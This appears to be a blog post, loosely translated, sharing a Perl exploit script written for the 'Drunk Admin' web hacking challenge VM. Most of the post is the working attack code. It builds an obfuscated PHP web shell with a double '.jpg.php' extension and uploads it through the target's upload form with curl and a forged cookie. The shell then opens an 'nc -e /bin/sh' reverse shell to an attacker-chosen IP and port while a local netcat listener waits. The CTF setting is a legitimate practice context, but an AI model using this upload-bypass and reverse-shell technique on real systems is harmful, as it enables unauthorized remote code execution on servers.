Remote exploit for “Drunk Admin”


Anestis Bechtsoudis O (@ anestisb) a few months ago, being a guest at the third consecutive UNAUTHORIZED - security meeting (401 × 003), held in Athens Hackserpace, presented the application WeBaCoo. By the way, told us about a Web hacking challenge had prepared, codenamed "Drunk Admin Web Hacking Challenge". Unfortunately then, I had time I would like to deal with solving the challenge so I left it for when I would find a little time.

Since these days, I found some free time, I sit and I try my luck against the drunk admin. Since then, I downloaded the virtual machine (md5sum: edf9bcd28049ed85312510d5872ea463) found that there were already posted two (1.2) solutions so if he decides to continue with the resolution should definitely find another more "original" no way that is, WeBaCoo use at all or some similar technique.

So I prepared a simple scriptaki in perl

video


use LWP::UserAgent;
use Digest::MD5 qw( md5_hex );

# -----------------------------------------------------------------------------------------
#  HangOver v.1 : Remote exploitation script for "Drunk Admin" Web Hacking Challenge.
# -----------------------------------------------------------------------------------------
#
#  WARNING : Don't drink and code! ;)
#  mr.pr0n - http://ghostinthelab.wordpress.com - (@_pr0n_)
#
# -----------------------------------------------------------------------------------------
#  Many thanks to Anestis Bechtsoudis (@anestisb) for this challenge.
# -----------------------------------------------------------------------------------------

print "+-----------------------------------+\n";
print "| HangOver v.1 - Run(2)Shell Script |\n";
print "+-----------------------------------+\n";

print "\nEnter the IP address of the target box (e.g.: http://192.168.178.39)";
print "\n> ";
$target=<STDIN>;
chomp($target);
$target = "http://".$target if ($target !~ /^http:/);

print "\nEnter the IP address for the reverse connection (e.g.: 192.168.178.27)";
print "\n> ";
$ip=<STDIN>;
chomp($ip);

print "\nEnter the port to connect back on (e.g.: 4444)";
print "\n> ";
$port=<STDIN>;
chomp($port);

$payload =
'<?php'."\n".
'$a = "nc";'."\n".
'$b = " -e ";'."\n".
'$c = "/bin/sh '.$ip.' '.$port.'";'."\n".
'$cmd = $a.$b.$c;'."\n".
'$dead = "echo ex";'."\n".
'$beef = "ec(\'".$cmd ."\');";'."\n".
'$send = $dead.$beef;'."\n".
'echo eval($send);'."\n".
'?>';

$filename = int(rand()*10110110).".jpg.php";
open FILE, ">$filename" or die $!;
print FILE $payload;
close FILE;

print "\n[+]Uploading the shell to server...\n";
system('curl -s -b trypios=uploader -F image=@'.$filename.' -F "Submit=Host My Awesome Image" '.$target.':8880/upload.php');

$nc= "nc -lvp $port";
system("xterm -e $nc &");

$md5 = md5_hex("$filename");

print "\n[+]Check for the shell:\n";
print $target.":8880/images/".$md5.".php\n\n";

Credit to 
mr.pr0n & anestisb

Postingan terkait:

Belum ada tanggapan untuk "Remote exploit for “Drunk Admin”"

Post a Comment